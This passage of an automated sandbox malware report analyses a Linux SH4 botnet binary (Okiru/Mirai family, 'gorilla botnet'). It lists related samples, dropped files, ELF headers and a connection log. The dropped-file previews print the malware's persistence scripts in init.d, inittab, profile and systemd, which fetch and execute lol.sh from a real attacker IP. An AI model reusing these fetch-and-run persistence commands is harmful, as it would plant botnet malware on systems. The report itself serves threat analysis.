	RpcSecurity.arc.elf	Get hash	malicious	Mirai	Browse
	RpcSecurity.sh4.elf	Get hash	malicious	Unknown	Browse
	db0fa4b8db0333367e9bda3ab68b8042.arm5.elf	Get hash	malicious	Unknown	Browse
	db0fa4b8db0333367e9bda3ab68b8042.ppc.elf	Get hash	malicious	Unknown	Browse
	db0fa4b8db0333367e9bda3ab68b8042.arm.elf	Get hash	malicious	Unknown	Browse
	bin.sh.elf	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	db0fa4b8db0333367e9bda3ab68b8042.mpsl.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	RpcSecurity.arm5.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	RpcSecurity.arm7.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
	RpcSecurity.ppc.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	RpcSecurity.arc.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	RpcSecurity.sh4.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	db0fa4b8db0333367e9bda3ab68b8042.arm5.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	db0fa4b8db0333367e9bda3ab68b8042.ppc.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
AMAZON-02US	db0fa4b8db0333367e9bda3ab68b8042.i686.elf	Get hash	malicious	Mirai, Gafgyt	Browse	35.73.111.15
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	54.171.230.55
	5935c1f1a7da8e42028da77013b80635afdd605866569.exe	Get hash	malicious	Unknown	Browse	18.167.52.240
	aD7D9fkpII.exe	Get hash	malicious	Vidar	Browse	18.238.49.124
	http://www.finanzamthessen.de	Get hash	malicious	Unknown	Browse	54.75.69.192
	installer.bat	Get hash	malicious	Vidar	Browse	108.139.47.108
	din.exe	Get hash	malicious	Vidar	Browse	18.238.49.74
	db0fa4b8db0333367e9bda3ab68b8042.sh4.elf	Get hash	malicious	Mirai, Gafgyt	Browse	54.126.82.77
	RpcSecurity.mips.elf	Get hash	malicious	Unknown	Browse	54.217.10.153
	RpcSecurity.x86_64.elf	Get hash	malicious	Unknown	Browse	34.243.160.129
INIT7CH	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	109.202.202.202
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse	109.202.202.202
	db0fa4b8db0333367e9bda3ab68b8042.mpsl.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	RpcSecurity.arm5.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	RpcSecurity.arc.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	RpcSecurity.sh4.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	db0fa4b8db0333367e9bda3ab68b8042.arm5.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	db0fa4b8db0333367e9bda3ab68b8042.ppc.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	db0fa4b8db0333367e9bda3ab68b8042.arm.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	bin.sh.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
NETIXBG	arm5.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	mips.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	sparc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/rc.local	arm5.nn.elf	Get hash	malicious	Okiru	Browse
	mips.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	sparc.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	m68k.nn.elf	Get hash	malicious	Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse

Created / dropped Files

/boot/bootcmd

Download File

Process:	/tmp/sh4.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	125
Entropy (8bit):	4.607704972396967
Encrypted:	false
SSDEEP:	3:KPJRXKhiFDDoCvLdjX43LbaaFOdFXa5O:WJRKkfoYZX47baaeXCO
MD5:	1E5FB577BA9A2DB837D825C59DC3DC86
SHA1:	BAC6AB8B43A5C6A710B4170645BD2C53CEBD0DEF
SHA-256:	836B56DFC0F6626F776374B380A995F77F4E94EEF24072526D37DFAC9E28517D
SHA-512:	A7A4B41E1B989611D3ACFE55F5349B431553098BB0EBA4B4B1C1CACB6EF671367BF97F30B8D43325D68AC703A5E389BC34DC4D5120771D28D76B08C5645A90ED
Malicious:	false
Reputation:	low
Preview:	run bootcmd_mmc0; /tmp/sh4.nn.elf && wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/init.d/sh4.nn.elf

Download File

Process:	/bin/sh
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	401
Entropy (8bit):	4.518776365588406
Encrypted:	false
SSDEEP:	12:QRk/XNxaN2KUJgjvMUFRuKN+dRRucSOyd3:+M1IJoYOM3
MD5:	E1535A228E2457782A03FA3E2D008949
SHA1:	FFE30444D9D7BE7F316876E4F45665A0C5FBE622
SHA-256:	A2B03F3334FABA1D465409046BC461A9408FE9124095C9AA858790BE084B9407
SHA-512:	251C6DA27A4ED959BBE6D0D8A092181D5D157020018F2E64316A37E91127509A4E3D90350A88F4FB6C4C29C687108E299EE2583640FDF729F2680290E1E30731
Malicious:	true
Reputation:	low
Preview:	#!/bin/sh.# /etc/init.d/sh4.nn.elf..case "" in. start). echo 'Starting sh4.nn.elf'. /tmp/sh4.nn.elf &. wget http://94.156.227.229/lol.sh -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping sh4.nn.elf'. killall sh4.nn.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start\|stop\|restart}". exit 1. ;;.esac.exit 0.

/etc/init.d/system

Download File

Process:	/tmp/sh4.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	112
Entropy (8bit):	4.564760639246532
Encrypted:	false
SSDEEP:	3:TKH4vZKKhiFDvSDRFiLdjX43LpaKB0dFLoKE0:h8KkzSXoZX47zBeLXE0
MD5:	7802DC8B3E6A7582915CC6AB07285477
SHA1:	7DD2673BD316568C8C2E600A719BAF11FB1195F8
SHA-256:	FC3B0B3B04CAD7A49242A16B8D98693386298603235CBBA80E6DAB08C8C8CD97
SHA-512:	CED12DC4DDDBC440D0D3D0EC82C19B181BC2C124B98316C23BE5A2E42FB2D8780822E5F874309C8E1B3351F88D112A538CB528ED4E6B1CD9F2E7691F6B9D0DBA
Malicious:	true
Reputation:	low
Preview:	#!/bin/sh./tmp/sh4.nn.elf &.wget http://94.156.227.229/lol.sh -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.

/etc/inittab

Download File

Process:	/tmp/sh4.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	117
Entropy (8bit):	4.530813475899901
Encrypted:	false
SSDEEP:	3:nAWu5IhiFDDoCvLdjX43LbaaFOdFXa5O:AykfoYZX47baaeXCO
MD5:	EBEDB90F4BD4CC404188426AEC466437
SHA1:	F775973C914D2B195CFC5BA0DA01265689FFF31D
SHA-256:	A4B7EC86100E1E8467E7D710EF31DC7950F6168317267637A6E421F55919EE37
SHA-512:	36A9D6D9A001BA1552DF03C7323575F0A27EC4F15735F5815353298D1D9F81EE104271CE596C4A7CA88A1438444E378A7CAA499E8A084582E4636E7C42B0B62C
Malicious:	false
Reputation:	low
Preview:	::respawn:/tmp/sh4.nn.elf && wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/motd

Download File

Process:	/tmp/sh4.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	53
Entropy (8bit):	3.871459242626451
Encrypted:	false
SSDEEP:	3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
MD5:	2BD9B4BE30579E633FC0191AA93DF486
SHA1:	7D63A9BD9662E86666B27C1B50DB8E7370C624FF
SHA-256:	64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
SHA-512:	AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	gorilla botnet is on the device ur not a cat go away.

/etc/profile

Download File

Process:	/tmp/sh4.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	108
Entropy (8bit):	4.41768887765548
Encrypted:	false
SSDEEP:	3:TgKhiFDvSDRFiLdjX43LbaaFOdFXa50:TgKkzSXoZX47baaeXC0
MD5:	4F3F6A734FB83A562224B31264725B91
SHA1:	2611086E1CC70A805A32C304C8E3C4EDC9FF08CF
SHA-256:	A898F4CF0A3C1EF8072DF1A706E7839B0822D32AAD25DE0D47A7305A1534590D
SHA-512:	88AC0D314751CD46F23AA25F1EC2BC2678FE38405EA580A2638BC87F43A82B2F2F7A11D79885D11C743E15FBD5B6BC546546C007A245EF18C3219B7415DEF8AB
Malicious:	true
Reputation:	low
Preview:	/tmp/sh4.nn.elf &.wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.

/etc/rc.local

Download File

Process:	/tmp/sh4.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	10
Entropy (8bit):	3.121928094887362
Encrypted:	false
SSDEEP:	3:TKH4vn:hv
MD5:	3E2B31C72181B87149FF995E7202C0E3
SHA1:	BD971BEC88149956458A10FC9C5ECB3EB99DD452
SHA-256:	A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
SHA-512:	543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: arm5.nn.elf, Detection: malicious, Browse Filename: mips.nn.elf, Detection: malicious, Browse Filename: mipsel.nn.elf, Detection: malicious, Browse Filename: sparc.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: m68k.nn.elf, Detection: malicious, Browse Filename: powerpc.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: mipsel.nn.elf, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.

/etc/systemd/system/custom.service

Download File

Process:	/tmp/sh4.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	306
Entropy (8bit):	5.049139506717654
Encrypted:	false
SSDEEP:	6:z8ifitRZAMzdK+mO02+GWRAZX47N2+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+Vp+GWRkKY+GWRXY+GWRuL6
MD5:	94F8BF160EEAD28F1BD47B7638928464
SHA1:	0D4DC2868D7965D11AA8A6E805B984643C149389
SHA-256:	5A793F3FD1D84006C76B92EFA5D10870D23D4E9697452ABDF57438753E78017A
SHA-512:	C86FF6EC8DBC388A47C824454EBACEC43980E48DAB9CAA1DE9750857F0F13989DEB534B69C8780BA2F6A1391C10D3E01F83FD2EC510B701FB8D2F36F170D256E
Malicious:	false
Preview:	[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/sh4.nn.elf.ExecStartPost=/usr/bin/wget http://94.156.227.229/lol.sh -O /tmp/lol.sh.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/tmp/qemu-open.L0CwJZ (deleted)

Download File

Process:	/tmp/sh4.nn.elf
File Type:	data
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.625
Encrypted:	false
SSDEEP:	3:TgKhiln:TgKEn
MD5:	AA13A1788DEE62AD7B81E381463BF8D7
SHA1:	0E21290B03BAD90EC3B1D5638F84929E822F6AAE
SHA-256:	53D5AB596D45FDDA9C031F87D2CC18EEBF3710689256F65DA7577E20EB59AEEA
SHA-512:	3E78B3236C5696912F507060451E200251009DB6DF3D5CE0CDD4F1108FB600A3FB768C811ED6700D48890651DE1B6A7507AC311F2BAC717C3E9B333BA94E0140
Malicious:	false
Preview:	/tmp/sh4.nn.elf.

Static File Info

General

File type:	ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.946641910076239
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	sh4.nn.elf
File size:	81'328 bytes
MD5:	24caeeba560b79d96f69e0fa802c1027
SHA1:	4af4647443fe983466e106df0ab343a2c33ba271
SHA256:	dd693e64b0d5e76716ab7b4cb4ee52c19e70caddf9dd42f49df408acc93eca38
SHA512:	56a9adc92818e6d17e07b43f3e9443ad76dd0704418efa92e2d9dd0a92293d4dd9ea200b05e4ddd49c5c5ef801b7289c0fa5c76df859d1ffa3ac070a0c3b050b
SSDEEP:	1536:T+odNn9WQfwRPhg06mEAdKnLfG7CU0dr9CL1iXPuo:HrqsCEnaX0N9Nfuo
TLSH:	98839D73C8356E14D54442B4B5B28F742B53F580956B2EFA59A7C2798043EACF31A3F4
File Content Preview:	.ELF.....................@.4....;......4. ...(...............@...@..6...6...............6...6B..6B......&..........Q.td............................././"O.n........#.@........#.*@.....o&O.n...l..............................././.../.a"O.!...n...a.b("...q.

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	<unknown>
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x4001a0
Flags:	0x9
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	80888
Section Header Size:	40
Number of Section Headers:	11
Header String Table Index:	10

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x400094	0x94	0x30	0x0	0x6	AX	4
.text	PROGBITS	0x4000e0	0xe0	0x11100	0x0	0x6	AX	32
.fini	PROGBITS	0x4111e0	0x111e0	0x24	0x0	0x6	AX	4
.rodata	PROGBITS	0x411204	0x11204	0x24d0	0x0	0x2	A	4
.ctors	PROGBITS	0x4236d8	0x136d8	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x4236e0	0x136e0	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x4236ec	0x136ec	0x4b8	0x0	0x3	WA	4
.got	PROGBITS	0x423ba4	0x13ba4	0x10	0x4	0x3	WA	4
.bss	NOBITS	0x423bb4	0x13bb4	0x2214	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0x13bb4	0x43	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x136d4	0x136d4	6.9772	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x136d8	0x4236d8	0x4236d8	0x4dc	0x26f0	4.6346	0x6	RW	0x10000	.ctors .dtors .data .got .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 09:21:37.136133909 CET	443	33606	54.171.230.55	192.168.2.23
Dec 27, 2024 09:21:37.136420012 CET	33606	443	192.168.2.23	54.171.230.55
Dec 27, 2024 09:21:37.255923986 CET	443	33606	54.171.230.55	192.168.2.23
Dec 27, 2024 09:21:39.313905954 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:39.433412075 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:39.433480024 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:39.433774948 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:39.553236008 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:39.648232937 CET	43928	443	192.168.2.23	91.189.91.42
Dec 27, 2024 09:21:39.958852053 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:40.162568092 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:40.682239056 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:40.682301044 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:40.964256048 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:41.083858013 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:41.083960056 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:41.083960056 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:41.203593969 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:41.600052118 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:41.760348082 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:42.239305973 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:42.239372015 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:42.658731937 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:42.778450966 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:42.778512001 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:42.778544903 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:42.898050070 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:43.301812887 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:43.464288950 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:44.055633068 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:44.055716991 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:44.304630041 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:44.424379110 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:44.424498081 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:44.424643993 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:44.544076920 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:44.932918072 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:45.100290060 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:45.279468060 CET	42836	443	192.168.2.23	91.189.91.43
Dec 27, 2024 09:21:45.573327065 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:45.573405981 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:45.934113979 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:46.053599119 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:46.053668022 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:46.053723097 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:46.173259020 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:46.559611082 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:46.720426083 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:46.818228960 CET	42516	80	192.168.2.23	109.202.202.202
Dec 27, 2024 09:21:47.195641041 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:47.195735931 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:47.561285019 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:47.680926085 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:47.680985928 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:47.681031942 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:47.800554991 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:48.185554981 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:48.348495007 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:48.801016092 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:48.801080942 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:49.186940908 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:49.306459904 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:49.306519985 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:49.306567907 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:49.426306009 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:49.811726093 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:49.972404003 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:50.510330915 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:50.510420084 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:50.812843084 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:50.932534933 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:50.932595968 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:50.932636976 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:51.052290916 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:51.436774015 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:51.600334883 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:52.054383039 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:52.054467916 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:52.437813044 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:52.557399988 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:52.557459116 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:52.557496071 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:52.677030087 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:53.062625885 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:53.224374056 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:53.781276941 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:53.781379938 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:54.064202070 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:54.183759928 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:54.183828115 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:54.183887959 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:54.303386927 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:54.687670946 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:54.848397017 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:55.368515015 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:55.368573904 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:55.688816071 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:55.808373928 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:55.808470011 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:55.808470011 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:55.928018093 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:56.312602997 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:56.476295948 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:57.021954060 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:57.022015095 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:57.313647985 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:57.433178902 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:57.433253050 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:57.433283091 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:57.552864075 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:57.937302113 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:58.100387096 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:58.584569931 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:58.584645033 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:58.938357115 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:59.057847023 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:59.057945967 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:59.057967901 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:59.177520037 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 27, 2024 09:21:59.562112093 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:21:59.724359989 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:00.229492903 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:00.229578018 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:00.563077927 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:00.637326956 CET	43928	443	192.168.2.23	91.189.91.42
Dec 27, 2024 09:22:00.682605028 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:00.682677031 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:00.682698965 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:00.802294970 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:01.185599089 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:01.348334074 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:01.902393103 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:01.902455091 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:02.186348915 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:02.307327986 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 27, 2024 09:22:02.307399988 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:22:02.307423115 CET	60052	38242	192.168.2.23	94.156.227.234
